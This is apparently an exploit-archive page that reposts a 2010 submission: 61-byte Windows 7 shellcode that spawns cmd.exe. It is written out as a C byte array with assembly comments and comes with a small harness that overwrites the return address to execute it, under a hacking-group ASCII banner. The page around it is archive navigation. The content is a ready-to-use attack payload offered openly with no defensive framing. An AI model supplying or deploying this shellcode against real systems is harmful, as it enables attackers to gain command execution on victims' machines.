Windows Seven cmd.exe Shellcode

Windows Seven cmd.exe Shellcode: Posted Jun 2, 2010; Authored by agix; 61 bytes small Windows 7 x64 cmd.exe shellcode.; tags | shellcode; systems | windows; SHA-256 | df8d657040e51b5cb8fa86b3eb4ccfef05106cd4921e1b6ef6e3af77316d39c6; Download | Favorite | View

Windows Seven cmd.exe Shellcode

 /*
 | Title: Windows Seven x64 (cmd) Shellcode 61 Bytes
 | Type: Shellcode
 | Author: agix
 | Platform: win32
 | Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En
*/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##################################                1
0                    I'm agix member from Inj3ct0r Team                1
1                    ##################################                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#include <stdio.h>

char shellcode[] =

"\x31\xC9"               //xor ecx,ecx
"\x64\x8B\x71\x30"           //mov esi,[fs:ecx+0x30]
"\x8B\x76\x0C"             //mov esi,[esi+0xc]
"\x8B\x76\x1C"             //mov esi,[esi+0x1c]
"\x8B\x36"               //mov esi,[esi]
"\x8B\x06"               //mov eax,[esi]
"\x8B\x68\x08"             //mov ebp,[eax+0x8]
"\xEB\x20"               //jmp short 0x35
"\x5B"                 //pop ebx
"\x53"                 //push ebx
"\x55"                 //push ebp
"\x5B"                 //pop ebx
"\x81\xEB\x11\x11\x11\x11"     //sub ebx,0x11111111
"\x81\xC3\xDA\x3F\x1A\x11"     //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
"\xFF\xD3"               //call ebx
"\x81\xC3\x11\x11\x11\x11"     //add ebx,0x11111111
"\x81\xEB\x8C\xCC\x18\x11"     //sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
"\xFF\xD3"               //call ebx
"\xE8\xDB\xFF\xFF\xFF"         //call dword 0x15
//db "cmd"
"\x63\x6d\x64";


int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Windows Seven cmd.exe Shellcode

Windows Seven cmd.exe Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Windows Seven cmd.exe Shellcode

Share This

Windows Seven cmd.exe Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems